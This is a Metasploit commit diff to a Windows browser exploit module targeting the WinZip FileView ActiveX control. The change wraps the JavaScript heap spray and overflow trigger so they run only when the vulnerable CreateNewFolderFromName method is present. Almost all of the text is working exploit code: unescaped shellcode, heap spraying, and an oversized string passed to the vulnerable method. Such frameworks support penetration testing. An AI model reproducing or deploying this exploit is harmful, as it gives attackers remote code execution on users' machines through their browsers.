play a little nicer with browser autopwn by not spraying the heap if creating the vulnerable object failed

git-svn-id: file:///home/svn/framework3/trunk@12667 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/winzip_fileview.rb

@@ -92,11 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		rand6  = rand_text_alpha(rand(100) + 1)
 		rand7  = rand_text_alpha(rand(100) + 1)
 		rand8  = rand_text_alpha(rand(100) + 1)
+		boom   = rand_text_alpha(rand(100) + 1)
 
 		content = %Q|
 			<html>
 				<object id='#{vname}' classid='clsid:A09AE68F-B14D-43ED-B713-BA413F034904'></object>
 				<script language="JavaScript">
+				function #{boom}() {
 				var #{rand1} = unescape('#{shellcode}');
 				var #{rand2} = unescape('#{ret}');
 				var #{rand3} = 20;
@@ -110,6 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				var #{rand8} = "A";
 				for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + #{rand2} }
 				#{vname}.CreateNewFolderFromName(#{rand8});
+				}
+				if ((typeof #{vname}.CreateNewFolderFromName) != "undefined") {
+					#{boom}();
+				}
 				</script>
 			</html>
 			|